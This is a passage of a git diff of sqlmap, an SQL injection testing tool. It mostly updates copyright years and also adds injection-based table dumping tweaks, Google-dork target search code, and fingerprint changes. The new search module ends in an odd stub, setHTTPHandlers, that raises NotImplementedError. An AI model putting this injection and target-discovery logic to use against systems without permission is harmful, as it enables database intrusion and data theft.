time=blind, union=not blind, error=not blind)) + try: for i in xrange(count): if breakRetrieval: break for column in colList: - def _(pivotValue): - if column == colList[0]: - query = dumpNode.query.replace("'%s'", "%s") % (agent.preprocessField(table, column), table, agent.preprocessField(table, column), unescaper.escape(pivotValue, False)) - else: - query = dumpNode.query2.replace("'%s'", "%s") % (agent.preprocessField(table, column), table, agent.preprocessField(table, colList[0]), unescaper.escape(pivotValue, False)) - - query = whereQuery(query) - - return unArrayizeValue(inject.getValue(query, blind=blind, time=blind, union=not blind, error=not blind)) - - value = _(pivotValue) + value = _(column, pivotValue) if column == colList[0]: if isNoneValue(value): - for pivotValue in filter(None, (" " if pivotValue == " " else None, "%s%s" % (pivotValue[0], unichr(ord(pivotValue[1]) + 1)) if len(pivotValue) > 1 else None, unichr(ord(pivotValue[0]) + 1))): - value = _(pivotValue) - if not isNoneValue(value): - break + try: + for pivotValue in filter(None, (" " if pivotValue == " " else None, "%s%s" % (pivotValue[0], unichr(ord(pivotValue[1]) + 1)) if len(pivotValue) > 1 else None, unichr(ord(pivotValue[0]) + 1))): + value = _(column, pivotValue) + if not isNoneValue(value): + break + except ValueError: + pass + if isNoneValue(value): breakRetrieval = True break @@ -152,10 +162,12 @@ def pivotDumpTable(table, colList, count=None, blind=True): value = "" if isNoneValue(value) else unArrayizeValue(value) - lengths[column] = max(lengths[column], len(value) if value else 0) + lengths[column] = max(lengths[column], len(DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value)))) entries[column].append(value) except KeyboardInterrupt: + kb.dumpKeyboardInterrupt = True + warnMsg = "user aborted during enumeration. 
sqlmap " warnMsg += "will display partial output" logger.warn(warnMsg) @@ -167,18 +179,3 @@ def pivotDumpTable(table, colList, count=None, blind=True): logger.critical(errMsg) return entries, lengths - -def whereQuery(query): - if conf.dumpWhere and query: - prefix, suffix = query.split(" ORDER BY ") if " ORDER BY " in query else (query, "") - - if "%s)" % conf.tbl.upper() in prefix.upper(): - prefix = re.sub(r"(?i)%s\)" % re.escape(conf.tbl), "%s WHERE %s)" % (conf.tbl, conf.dumpWhere), prefix) - elif re.search(r"(?i)\bWHERE\b", prefix): - prefix += " AND %s" % conf.dumpWhere - else: - prefix += " WHERE %s" % conf.dumpWhere - - query = "%s ORDER BY %s" % (prefix, suffix) if suffix else prefix - - return query diff --git a/lib/utils/progress.py b/lib/utils/progress.py index 98397d81e..eb45d2388 100644 --- a/lib/utils/progress.py +++ b/lib/utils/progress.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/utils/purge.py b/lib/utils/purge.py index 1447f8061..437e047ba 100644 --- a/lib/utils/purge.py +++ b/lib/utils/purge.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -11,6 +11,7 @@ import shutil import stat import string +from lib.core.common import getSafeExString from lib.core.data import logger def purge(directory): @@ -79,4 +80,4 @@ def purge(directory): try: shutil.rmtree(directory) except OSError, ex: - logger.error("problem occurred while removing directory '%s' ('%s')" % (directory, unicode(ex))) + logger.error("problem occurred while removing directory '%s' ('%s')" % (directory, getSafeExString(ex))) diff --git a/lib/utils/search.py b/lib/utils/search.py new file mode 100644 index 000000000..ee8fd76f9 --- /dev/null +++ b/lib/utils/search.py @@ -0,0 +1,192 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +import httplib +import re +import socket +import urllib +import urllib2 + +from lib.core.common import getSafeExString +from lib.core.common import getUnicode +from lib.core.common import popValue +from lib.core.common import pushValue +from lib.core.common import readInput +from lib.core.common import urlencode +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import CUSTOM_LOGGING +from lib.core.enums import HTTP_HEADER +from lib.core.enums import REDIRECTION +from lib.core.exception import SqlmapBaseException +from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapUserQuitException +from lib.core.settings import DUMMY_SEARCH_USER_AGENT +from lib.core.settings import DUCKDUCKGO_REGEX +from lib.core.settings import DISCONNECT_SEARCH_REGEX +from lib.core.settings import GOOGLE_REGEX +from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE +from lib.core.settings import UNICODE_ENCODING +from lib.request.basic import decodePage +from thirdparty.socks import socks + + +def _search(dork): + """ + This method performs the effective search on Google providing + the google dork and the Google session cookie + """ + + if not dork: + return None + + headers = {} + + headers[HTTP_HEADER.USER_AGENT] = 
dict(conf.httpHeaders).get(HTTP_HEADER.USER_AGENT, DUMMY_SEARCH_USER_AGENT) + headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE + + try: + req = urllib2.Request("https://www.google.com/ncr", headers=headers) + conn = urllib2.urlopen(req) + except Exception, ex: + errMsg = "unable to connect to Google ('%s')" % getSafeExString(ex) + raise SqlmapConnectionException(errMsg) + + gpage = conf.googlePage if conf.googlePage > 1 else 1 + logger.info("using search result page #%d" % gpage) + + url = "https://www.google.com/search?" + url += "q=%s&" % urlencode(dork, convall=True) + url += "num=100&hl=en&complete=0&safe=off&filter=0&btnG=Search" + url += "&start=%d" % ((gpage - 1) * 100) + + try: + req = urllib2.Request(url, headers=headers) + conn = urllib2.urlopen(req) + + requestMsg = "HTTP request:\nGET %s" % url + requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str + logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) + + page = conn.read() + code = conn.code + status = conn.msg + responseHeaders = conn.info() + page = decodePage(page, responseHeaders.get("Content-Encoding"), responseHeaders.get("Content-Type")) + + responseMsg = "HTTP response (%s - %d):\n" % (status, code) + + if conf.verbose <= 4: + responseMsg += getUnicode(responseHeaders, UNICODE_ENCODING) + elif conf.verbose > 4: + responseMsg += "%s\n%s\n" % (responseHeaders, page) + + logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) + except urllib2.HTTPError, e: + try: + page = e.read() + except Exception, ex: + warnMsg = "problem occurred while trying to get " + warnMsg += "an error page information (%s)" % getSafeExString(ex) + logger.critical(warnMsg) + return None + except (urllib2.URLError, httplib.error, socket.error, socket.timeout, socks.ProxyError): + errMsg = "unable to connect to Google" + raise SqlmapConnectionException(errMsg) + + retVal = [urllib.unquote(match.group(1) or match.group(2)) for match in re.finditer(GOOGLE_REGEX, page, re.I)] + + if not retVal and "detected unusual traffic" in page: + warnMsg = "Google has detected 'unusual' traffic from " + warnMsg += "used IP address disabling further searches" + logger.warn(warnMsg) + + if not retVal: + message = "no usable links found. What do you want to do?" + message += "\n[1] (re)try with DuckDuckGo (default)" + message += "\n[2] (re)try with Disconnect Search" + message += "\n[3] quit" + choice = readInput(message, default='1') + + if choice == '3': + raise SqlmapUserQuitException + elif choice == '2': + url = "https://search.disconnect.me/searchTerms/search?" + url += "start=nav&option=Web" + url += "&query=%s" % urlencode(dork, convall=True) + url += "&ses=Google&location_option=US" + url += "&nextDDG=%s" % urlencode("/search?q=%s&setmkt=en-US&setplang=en-us&setlang=en-us&first=%d&FORM=PORE" % (urlencode(dork, convall=True), (gpage - 1) * 10), convall=True) + url += "&sa=N&showIcons=false&filterIcons=none&js_enabled=1" + regex = DISCONNECT_SEARCH_REGEX + else: + url = "https://duckduckgo.com/d.js?" 
+ url += "q=%s&p=%d&s=100" % (urlencode(dork, convall=True), gpage) + regex = DUCKDUCKGO_REGEX + + try: + req = urllib2.Request(url, headers=headers) + conn = urllib2.urlopen(req) + + requestMsg = "HTTP request:\nGET %s" % url + requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str + logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) + + page = conn.read() + code = conn.code + status = conn.msg + responseHeaders = conn.info() + page = decodePage(page, responseHeaders.get("Content-Encoding"), responseHeaders.get("Content-Type")) + + responseMsg = "HTTP response (%s - %d):\n" % (status, code) + + if conf.verbose <= 4: + responseMsg += getUnicode(responseHeaders, UNICODE_ENCODING) + elif conf.verbose > 4: + responseMsg += "%s\n%s\n" % (responseHeaders, page) + + logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) + except urllib2.HTTPError, e: + try: + page = e.read() + except socket.timeout: + warnMsg = "connection timed out while trying " + warnMsg += "to get error page information (%d)" % e.code + logger.critical(warnMsg) + return None + except: + errMsg = "unable to connect" + raise SqlmapConnectionException(errMsg) + + retVal = [urllib.unquote(match.group(1)) for match in re.finditer(regex, page, re.I | re.S)] + + return retVal + +def search(dork): + pushValue(kb.redirectChoice) + kb.redirectChoice = REDIRECTION.YES + + try: + return _search(dork) + except SqlmapBaseException, ex: + if conf.proxyList: + logger.critical(getSafeExString(ex)) + + warnMsg = "changing proxy" + logger.warn(warnMsg) + + conf.proxy = None + + setHTTPHandlers() + return search(dork) + else: + raise + finally: + kb.redirectChoice = popValue() + +def setHTTPHandlers(): # Cross-linked function + raise NotImplementedError diff --git a/lib/utils/sqlalchemy.py b/lib/utils/sqlalchemy.py index 1b654ef2f..f85ff17a9 100644 --- a/lib/utils/sqlalchemy.py +++ b/lib/utils/sqlalchemy.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -9,6 +9,7 @@ import imp import logging import os import sys +import traceback import warnings _sqlalchemy = None @@ -53,8 +54,17 @@ class SQLAlchemy(GenericConnector): if self.dialect: conf.direct = conf.direct.replace(conf.dbms, self.dialect, 1) - engine = _sqlalchemy.create_engine(conf.direct, connect_args={'check_same_thread':False} if self.dialect == "sqlite" else {}) + engine = _sqlalchemy.create_engine(conf.direct, connect_args={"check_same_thread": False} if self.dialect == "sqlite" else {}) self.connector = engine.connect() + except (TypeError, ValueError): + if "_get_server_version_info" in traceback.format_exc(): + try: + import pymssql + if int(pymssql.__version__[0]) < 2: + raise SqlmapConnectionException("SQLAlchemy connection issue (obsolete version of pymssql ('%s') is causing problems)" % pymssql.__version__) + except ImportError: + pass + raise except SqlmapFilePathException: raise except Exception, msg: diff --git a/lib/utils/timeout.py b/lib/utils/timeout.py index 950caa717..33b010605 100644 --- a/lib/utils/timeout.py +++ b/lib/utils/timeout.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -9,25 +9,29 @@ import threading from lib.core.data import logger from lib.core.enums import CUSTOM_LOGGING +from lib.core.enums import 
TIMEOUT_STATE def timeout(func, args=(), kwargs={}, duration=1, default=None): class InterruptableThread(threading.Thread): def __init__(self): threading.Thread.__init__(self) self.result = None + self.timeout_state = None def run(self): try: self.result = func(*args, **kwargs) + self.timeout_state = TIMEOUT_STATE.NORMAL except Exception, msg: logger.log(CUSTOM_LOGGING.TRAFFIC_IN, msg) self.result = default + self.timeout_state = TIMEOUT_STATE.EXCEPTION thread = InterruptableThread() thread.start() thread.join(duration) if thread.isAlive(): - return default + return default, TIMEOUT_STATE.TIMEOUT else: - return thread.result + return thread.result, thread.timeout_state diff --git a/lib/utils/versioncheck.py b/lib/utils/versioncheck.py index a1cd1175a..f47825729 100644 --- a/lib/utils/versioncheck.py +++ b/lib/utils/versioncheck.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -10,7 +10,7 @@ import sys PYVERSION = sys.version.split()[0] if PYVERSION >= "3" or PYVERSION < "2.6": - exit("[CRITICAL] incompatible Python version detected ('%s'). For successfully running sqlmap you'll have to use version 2.6 or 2.7 (visit 'http://www.python.org/download/')" % PYVERSION) + exit("[CRITICAL] incompatible Python version detected ('%s'). For successfully running sqlmap you'll have to use version 2.6.x or 2.7.x (visit 'http://www.python.org/download/')" % PYVERSION) extensions = ("gzip", "ssl", "sqlite3", "zlib") try: @@ -18,6 +18,6 @@ try: __import__(_) except ImportError: errMsg = "missing one or more core extensions (%s) " % (", ".join("'%s'" % _ for _ in extensions)) - errMsg += "most probably because current version of Python has been " + errMsg += "most likely because current version of Python has been " errMsg += "built without appropriate dev packages (e.g. 
'libsqlite3-dev')" exit(errMsg) \ No newline at end of file diff --git a/lib/utils/xrange.py b/lib/utils/xrange.py index c5931b5d4..d525d05ba 100644 --- a/lib/utils/xrange.py +++ b/lib/utils/xrange.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -85,3 +85,9 @@ class xrange(object): def _index(self, i): return self.start + self.step * i + + def index(self, i): + if self.start <= i < self.stop: + return i - self.start + else: + raise ValueError("%d is not in list" % i) diff --git a/plugins/__init__.py b/plugins/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/plugins/__init__.py +++ b/plugins/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/__init__.py b/plugins/dbms/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/plugins/dbms/__init__.py +++ b/plugins/dbms/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/access/__init__.py b/plugins/dbms/access/__init__.py index bfb66e57e..53f8a7536 100644 --- a/plugins/dbms/access/__init__.py +++ b/plugins/dbms/access/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/access/connector.py b/plugins/dbms/access/connector.py index 03bcce91e..0ecb81623 100644 --- a/plugins/dbms/access/connector.py +++ b/plugins/dbms/access/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/access/enumeration.py b/plugins/dbms/access/enumeration.py index 1dc5bd991..dcf357a74 100644 --- a/plugins/dbms/access/enumeration.py +++ b/plugins/dbms/access/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/access/filesystem.py b/plugins/dbms/access/filesystem.py index ee471df2f..6d587b4a5 100644 --- a/plugins/dbms/access/filesystem.py +++ b/plugins/dbms/access/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/access/fingerprint.py b/plugins/dbms/access/fingerprint.py index 2cbe12835..a97ee4067 100644 --- a/plugins/dbms/access/fingerprint.py +++ b/plugins/dbms/access/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -146,7 +146,7 @@ class 
Fingerprint(GenericFingerprint): return value def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(ACCESS_ALIASES) or (conf.dbms or "").lower() in ACCESS_ALIASES): + if not conf.extensiveFp and Backend.isDbmsWithin(ACCESS_ALIASES): setDbms(DBMS.ACCESS) return True diff --git a/plugins/dbms/access/syntax.py b/plugins/dbms/access/syntax.py index b43500e15..6ee9ef791 100644 --- a/plugins/dbms/access/syntax.py +++ b/plugins/dbms/access/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/access/takeover.py b/plugins/dbms/access/takeover.py index f36dd0b7f..7d0729606 100644 --- a/plugins/dbms/access/takeover.py +++ b/plugins/dbms/access/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/db2/__init__.py b/plugins/dbms/db2/__init__.py index 0a5ea5718..723abbb37 100644 --- a/plugins/dbms/db2/__init__.py +++ b/plugins/dbms/db2/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/db2/connector.py b/plugins/dbms/db2/connector.py index feeb9b046..1f692e3a5 100644 --- a/plugins/dbms/db2/connector.py +++ b/plugins/dbms/db2/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/db2/enumeration.py b/plugins/dbms/db2/enumeration.py index ba4fdef9c..1e9777b13 100644 --- a/plugins/dbms/db2/enumeration.py +++ b/plugins/dbms/db2/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -18,4 +18,3 @@ class Enumeration(GenericEnumeration): logger.warn(warnMsg) return {} - diff --git a/plugins/dbms/db2/filesystem.py b/plugins/dbms/db2/filesystem.py index 616958820..b02afc7d3 100644 --- a/plugins/dbms/db2/filesystem.py +++ b/plugins/dbms/db2/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/db2/fingerprint.py b/plugins/dbms/db2/fingerprint.py index bc3f299ac..f8deb9a29 100644 --- a/plugins/dbms/db2/fingerprint.py +++ b/plugins/dbms/db2/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -81,7 +81,7 @@ class Fingerprint(GenericFingerprint): return value def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(DB2_ALIASES) or (conf.dbms or "").lower() in DB2_ALIASES): + if not conf.extensiveFp and Backend.isDbmsWithin(DB2_ALIASES): setDbms(DBMS.DB2) return True diff --git 
a/plugins/dbms/db2/syntax.py b/plugins/dbms/db2/syntax.py index 3a46c4d3b..00e8dc956 100644 --- a/plugins/dbms/db2/syntax.py +++ b/plugins/dbms/db2/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/db2/takeover.py b/plugins/dbms/db2/takeover.py index a505781cc..d1964a673 100644 --- a/plugins/dbms/db2/takeover.py +++ b/plugins/dbms/db2/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/firebird/__init__.py b/plugins/dbms/firebird/__init__.py index 2c63d088d..26d77ad67 100644 --- a/plugins/dbms/firebird/__init__.py +++ b/plugins/dbms/firebird/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/firebird/connector.py b/plugins/dbms/firebird/connector.py index 0f9beb088..275fd6401 100644 --- a/plugins/dbms/firebird/connector.py +++ b/plugins/dbms/firebird/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/firebird/enumeration.py b/plugins/dbms/firebird/enumeration.py index 1945860a0..51cdc3352 100644 --- a/plugins/dbms/firebird/enumeration.py +++ b/plugins/dbms/firebird/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/firebird/filesystem.py b/plugins/dbms/firebird/filesystem.py index ed033c2b5..fe7a6358f 100644 --- a/plugins/dbms/firebird/filesystem.py +++ b/plugins/dbms/firebird/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/firebird/fingerprint.py b/plugins/dbms/firebird/fingerprint.py index 8a8de5c70..7b7b6c557 100644 --- a/plugins/dbms/firebird/fingerprint.py +++ b/plugins/dbms/firebird/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -18,7 +18,6 @@ from lib.core.enums import DBMS from lib.core.session import setDbms from lib.core.settings import FIREBIRD_ALIASES from lib.core.settings import METADB_SUFFIX -from lib.core.settings import UNKNOWN_DBMS_VERSION from lib.request import inject from plugins.generic.fingerprint import Fingerprint as GenericFingerprint @@ -103,15 +102,7 @@ class Fingerprint(GenericFingerprint): return retVal def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(FIREBIRD_ALIASES) \ - or (conf.dbms or "").lower() in FIREBIRD_ALIASES) and Backend.getVersion() and \ - Backend.getVersion() != 
UNKNOWN_DBMS_VERSION: - v = Backend.getVersion().replace(">", "") - v = v.replace("=", "") - v = v.replace(" ", "") - - Backend.setVersion(v) - + if not conf.extensiveFp and Backend.isDbmsWithin(FIREBIRD_ALIASES): setDbms("%s %s" % (DBMS.FIREBIRD, Backend.getVersion())) self.getBanner() diff --git a/plugins/dbms/firebird/syntax.py b/plugins/dbms/firebird/syntax.py index c59666ade..0b52b3804 100644 --- a/plugins/dbms/firebird/syntax.py +++ b/plugins/dbms/firebird/syntax.py @@ -1,11 +1,10 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ -from lib.core.common import Backend from lib.core.common import isDBMSVersionAtLeast from plugins.generic.syntax import Syntax as GenericSyntax @@ -16,6 +15,7 @@ class Syntax(GenericSyntax): @staticmethod def escape(expression, quote=True): """ + >>> from lib.core.common import Backend >>> Backend.setVersion('2.0') ['2.0'] >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") diff --git a/plugins/dbms/firebird/takeover.py b/plugins/dbms/firebird/takeover.py index 78589f5a4..f450d2a07 100644 --- a/plugins/dbms/firebird/takeover.py +++ b/plugins/dbms/firebird/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/hsqldb/__init__.py b/plugins/dbms/hsqldb/__init__.py index 128704f61..cf7ae38d8 100644 --- a/plugins/dbms/hsqldb/__init__.py +++ b/plugins/dbms/hsqldb/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/hsqldb/connector.py b/plugins/dbms/hsqldb/connector.py index 0496badb4..a1444f956 100644 --- a/plugins/dbms/hsqldb/connector.py +++ b/plugins/dbms/hsqldb/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/hsqldb/enumeration.py b/plugins/dbms/hsqldb/enumeration.py index 9bf2b9b23..0dda3e52f 100644 --- a/plugins/dbms/hsqldb/enumeration.py +++ b/plugins/dbms/hsqldb/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -10,8 +10,9 @@ from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries -from lib.core.common import Backend from lib.core.common import unArrayizeValue +from lib.core.enums import DBMS +from lib.core.settings import HSQLDB_DEFAULT_SCHEMA from lib.request import inject class Enumeration(GenericEnumeration): @@ -26,7 +27,7 @@ class Enumeration(GenericEnumeration): infoMsg = "fetching banner" logger.info(infoMsg) - query = queries[Backend.getIdentifiedDbms()].banner.query + query = queries[DBMS.HSQLDB].banner.query kb.data.banner = unArrayizeValue(inject.getValue(query, safeCharEncode=True)) return kb.data.banner @@ -40,3 +41,6 @@ class Enumeration(GenericEnumeration): def getHostname(self): warnMsg = "on HSQLDB it is 
not possible to enumerate the hostname" logger.warn(warnMsg) + + def getCurrentDb(self): + return HSQLDB_DEFAULT_SCHEMA diff --git a/plugins/dbms/hsqldb/filesystem.py b/plugins/dbms/hsqldb/filesystem.py index 3e9dd9026..1f5ba523b 100644 --- a/plugins/dbms/hsqldb/filesystem.py +++ b/plugins/dbms/hsqldb/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/hsqldb/fingerprint.py b/plugins/dbms/hsqldb/fingerprint.py index 9f527a601..693b80dfb 100644 --- a/plugins/dbms/hsqldb/fingerprint.py +++ b/plugins/dbms/hsqldb/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -16,7 +16,6 @@ from lib.core.data import logger from lib.core.enums import DBMS from lib.core.session import setDbms from lib.core.settings import HSQLDB_ALIASES -from lib.core.settings import UNKNOWN_DBMS_VERSION from lib.request import inject from plugins.generic.fingerprint import Fingerprint as GenericFingerprint @@ -28,13 +27,13 @@ class Fingerprint(GenericFingerprint): value = "" wsOsFp = Format.getOs("web server", kb.headersFp) - if wsOsFp and not hasattr(conf, "api"): + if wsOsFp and not conf.api: value += "%s\n" % wsOsFp if kb.data.banner: dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) - if dbmsOsFp and not hasattr(conf, "api"): + if dbmsOsFp and not conf.api: value += "%s\n" % dbmsOsFp value += "back-end DBMS: " @@ -80,15 +79,7 @@ class Fingerprint(GenericFingerprint): """ - if not conf.extensiveFp and (Backend.isDbmsWithin(HSQLDB_ALIASES) \ - or (conf.dbms or "").lower() in HSQLDB_ALIASES) and Backend.getVersion() and \ - Backend.getVersion() != UNKNOWN_DBMS_VERSION: - v = Backend.getVersion().replace(">", "") - v = v.replace("=", "") - v = v.replace(" ", "") - - Backend.setVersion(v) - + if not conf.extensiveFp and Backend.isDbmsWithin(HSQLDB_ALIASES): setDbms("%s %s" % (DBMS.HSQLDB, Backend.getVersion())) if Backend.isVersionGreaterOrEqualThan("1.7.2"): diff --git a/plugins/dbms/hsqldb/syntax.py 